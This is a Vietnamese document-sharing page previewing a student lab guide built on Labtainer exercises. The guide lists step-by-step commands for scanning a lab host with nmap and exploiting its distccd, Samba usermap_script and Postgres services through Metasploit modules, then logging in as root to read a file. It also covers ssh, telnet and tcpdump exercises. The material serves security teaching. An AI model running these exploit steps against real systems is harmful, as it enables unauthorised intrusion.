1. Trang chủ
  2. » Giáo Dục - Đào Tạo

Bài 1 khai thác lỗ hổng dịch vụ sử dụng metasploit

12 1 0

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Tiêu đề Exploiting Service Vulnerabilities Using Metasploit
Định dạng
Số trang 12
Dung lượng 6,42 MB

Nội dung

Trang 1

Bài 1: Khai thác lỗ hổng dịch vụ sử dụng Metasploit

Bước 1: labtainer -r metasploit

Bước 2: ifconfig

Trang 2

Bước 3: Kiểm tra kết nối bằng ping

Bước 4: Quét các dịch vụ có thể tấn công: nmap -p0-65535 192.168.1.2

Trang 3

Bước 5: Khai thác dịch vụ cổng 513: rlogin -l root 192.168.1.2

Trang 4

-Trên terminal gõ: “sudo msfconsole”

-Tìm và tấn công dịch vụ distccd: search distccd

-Sử dụng công cụ khai thác: use exploit/unix/misc/distcc_exec

Trang 5

- Xem cấu hình liên quan đến exploit: options

- Đặt RHOST: set RHOST 192.168.1.2

Trang 6

- Khai thác lỗ hổng: exploit

- Đọc file : cat /root/filetoview.txt

Trang 7

Bước 8: Khai thác lỗ hổng IRC daemon (cổng 6667): Các bước thực hiện tương

Bước 10: Khai thác dịch vụ Samba service (cổng 139):

“sudo msfconsole” -> search usermap_script->

->set RHOST 192.168.1.2->exploit->cat /root/filetoview.txt

Bước 12: Khai thác dịch vụ Postgres (cổng 5432):

Trang 8

“sudo msfconsole” -> search postgres_payload->use exploit/linux/postgres/postgres_payload->set RHOST 192.168.1.2->exploit

->cat /root/filetoview.txt

Bước 13: Kết thúc bài lab: stoplab metasploit

Bài 4: Phát hiện các lỗ hổng bảo mật sử dụng công cụ rà quétBước 1: Xác định IP của máy

Bước 2: Trên máy khách mycomputer sử dụng nmap để tìm ra địa chỉ IP của

Trang 9

nmap để tìm cổng dịch vụ đang mở trên máy friedshrimp biết rằng cổng (port)

nằm từ 2000-3000.

Bước 3: Sau khi xác định được cổng ssh đang mở Sử dụng ssh để truy cập vào

máy chủ Tên máy chủ và mật khẩu là: ubuntu.

Trang 10

Bước 4: Sau khi truy cập được vào máy chủ friedshrimp đi tìm file

friedshrimp.txt Mở và đọc file.

Bước 5: Kết thúc bài lab: stoplab nmap-discovery

Bài 9: Sử dụng công cụ truy cập từ xa

Trang 11

Bước 1: Xác định IP của các máy

Bước 2: Trên máy khách sử dụng telnet để kết nối với máy chủ thông qua địa chỉ IP

Bước 3: Sau khi đăng nhập vào máy chủ, thực hiện việc đọc tệp có sẵn chứa đoạn mật mã

Trang 12

Bước 4: Trên server, chạy tcpdump để hiển thị lưu lượng mạng TCP và Thực hiện ssh từ máy khách vào máy chủ và đọc dữ liệu trên máy chủ

Bước 5: Kết thúc bài lab: stoplab telnetlab

Ngày đăng: 10/04/2024, 10:12

TÀI LIỆU CÙNG NGƯỜI DÙNG

TÀI LIỆU LIÊN QUAN

w